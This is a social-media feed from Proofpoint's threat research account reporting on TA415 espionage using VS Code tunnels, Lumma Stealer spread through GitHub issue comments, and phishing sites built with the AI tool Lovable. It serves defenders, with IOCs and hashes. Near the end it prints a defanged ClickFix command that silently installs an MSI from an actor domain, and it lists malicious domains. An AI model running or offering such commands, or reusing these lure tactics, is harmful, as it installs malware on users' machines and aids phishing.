banner
threatinsight.proofpoint.com
ThreatInsight
@threatinsight.proofpoint.com
290 followers 2 following 190 posts
Proofpoint's insights on targeted attacks and the cybersecurity threat landscape.
Posts Media Videos Starter Packs
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · 20d
TA415’s pivot to target organizations and those tied to U.S.-China relations is noteworthy given today’s geopolitical landscape.

See our full blog for a detailed breakdown of these July and Aug 2025 campaigns, infection chain, IOCs, and ET rules.
2
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · 20d
Key finding 3️⃣: This marks a tactical shift away from earlier malware like the “Voldemort” backdoor, showing the group’s ability to adapt.

Key finding 4️⃣: A primary objective of these campaigns is likely the collection of intel on the trajectory of U.S.-China economic ties.
1 2
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · 20d
Key finding 2️⃣: Instead of traditional #malware, the campaigns deployed Visual Studio Code Remote Tunnels.

This is likely a concerted effort from #TA415 to blend in with existing legitimate traffic to trusted services, including Google Sheets/Calendar, & VS Code Remote Tunnels.
TA415 VS Code Remote Tunnel infection chain.
1 1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · 20d
The group is impersonating trusted orgs and policymakers to target U.S. government, academic, and think tank targets.

Key finding 1️⃣: TA415 spoofed the U.S.-China Business Council and a senior congressional leader to deliver spearphishing lures tied to trade and sanctions policy.
TA415 phishing email spoofing US-China Business Council.
1 1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · 20d
Proofpoint threat researchers have published new research identifying a new cyber-espionage campaign by #TA415 (#APT41), a China-aligned threat actor, exploiting growing uncertainty in U.S.-China economic relations.

Blog: www.proofpoint.com/us/blog/thre....
Going Underground: China-aligned TA415 Conducts U.S.-China Economic Relations Targeting Using VS Code Remote Tunnels | Proofpoint US
What happened  Throughout July and August 2025, TA415 conducted spearphishing campaigns targeting United States government, think tank, and academic organizations utilizing U.S.-China
www.proofpoint.com
1 4 7
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Sep 3
On September 2-3 some of the files attached to the issues had random file names and were encrypted. While they contained an executable with the same name, the threat actor did not provide the password for these files so they could not be extracted and lead to any malware installation.
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Sep 3
Although GitHub has removed some of the malicious comments, the links in the messages remained active as of September 3, including the actor-controlled URLs.
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Sep 3
MD5: 4d8730a2f3388d018b7793f03fb79464
SHA1: cbc5b2181854a2672013422e02df9ea35c3c9e1c
SHA256: c8af1b27b718508574055b4271adc7246ddf4cec1c50b258d2c4179b19d0c839
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Sep 3
&X-Amz-Date=20250903T111859Z&X-Amz-Expires=300&X-Amz-Signature=f0cd8226472614321e6b9e3b883bffe0adf9d9255af1207374947ea71d3c8f76&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dfix.zip&response-content-type=application%2Fx-zip-compressed
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Sep 3
Retrieved From: hxxps://objects[.]githubusercontent[.]com/github-production-repository-file-5c1aeb/195216627/22101425?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20250903%2Fus-east-1%2Fs3%2Faws4_request [...] [continued in next post]
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Sep 3
The hash of the executable (and therefore the ZIP file) may vary depending on when the Lumma payload was built. Example:
File name: fix.zip
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Sep 3
The downloaded file is always named “fix.zip”, which contains “x86_64-w64-ranlib.exe” and “msvcp140.dll”. If the executable is run, it launches #Lumma via “msbuild.exe”.
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Sep 3
They claim to provide a fix for the reported problem. People who get these emails may include: the issue creator, the repository owner, the issue assignee, or any watchers.
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Sep 3
The comment includes either a link to the actor-controlled domain droplink[.]digital, a Dropbox URL, or a file attached directly to the issue (which creates a link to the file hosted on GitHub).
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Sep 3
Threat actors continue to abuse GitHub to deliver malware, this time: #LummaStealer. We identified GitHub notification emails that kick off the attack chain. Messages are sent when the threat actor, using an actor-controlled account, comments on existing GitHub issues. 🧵
1 2
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Aug 29
Threat actors are exploiting #Microsoft365 Direct Send to make their phishing campaigns appear to originate from inside an organization.

On this episode of DISCARDED, you'll hear why legacy features like Direct Send are a prime target for cybercriminals.

Stream now on our website: brnw.ch/21wVja5
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Aug 21
Something #spicy is coming to the next Only Malware in the Building podcast—dropping September 2. 🌶️

Bookmark the show page and reserve your seat at the table 🪑 alongside Selena Larson, Dave Bittner and Keith Mularski.

🔥 You won't want to miss it! thecyberwire.com/podcasts/onl...

#podcast #hotones
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Aug 20
With automatic web creation tools, threat actors can spend more time on multi-stage attack chains and more sophisticated tooling capabilities.

Developers of such tools should be mindful of opportunities for abuse and implement safeguards to prevent exploitation.

#socialengineering #impersonation
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Aug 20
Our blog has further insights on how Lovable is being leveraged by threat actors.

This activity demonstrates how AI tools can significantly lower the barrier to entry for cybercriminals, especially those focused on creating social engineering content that appeal to the end user.
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Aug 20
We've partnered with Lovable's Trust and Safety team to identify and take down hundreds of malicious domains.

The company says it's introducing security protections to proactively identify and block fraud activity and malicious users.

We thank them for their quick response and action.
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Aug 20
When we replicated the malicious activity, we encountered no guardrails or errors in trying to create our fake phishing website.

The website we generated was equipped with capabilities that impersonated prominent enterprise software to steal credentials.
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Aug 20
We have flagged tens of thousands of Lovable URLs as threats each month in email and SMS data since Feb 2025.

Threat actors create or clone websites that impersonate prominent brands, use CAPTCHA for filtering, and then post credentials to Telegram.
Example CAPTCHA that redirects to banking credential phishing website.
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Aug 20
You asked, we answered. AI tools are significantly lowering the barrier to entry for cybercriminals.

We have observed threat actor campaigns leveraging the AI-generated website builder Lovable to create and host cred phishing, malware, and fraud websites.

Learn more in our blog: brnw.ch/21wV3Zo
Website redirect impersonating Aave built with Lovable.
1
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Aug 18
Example system commands:

C:\Users\<username>\AppData\Local\Programs\MediaHuman Lyrics Finder Free\LdVBoxSVC.exe LdVBoxSVC.exe

Bitly redirect: hxxps://gitsecguards[.]com

ClickFix Landing domain: security[.]flaxergaurds[.]com
threatinsight.proofpoint.com
ThreatInsight @threatinsight.proofpoint.com · Aug 18
Organizations are encouraged to restrict PowerShell to only approved admin users.

Example ClickFix command: msiexec /i hxxps:///temopix[.]com /qn

Example of MSI: shields.msi | File Size: 10981376 Byte(s) (10,47 MB) | SHA256: 4c9df28e6b802ebe9e40f8fe34d2014b1fe524c64f7c8bd013f163c4daa794b2
1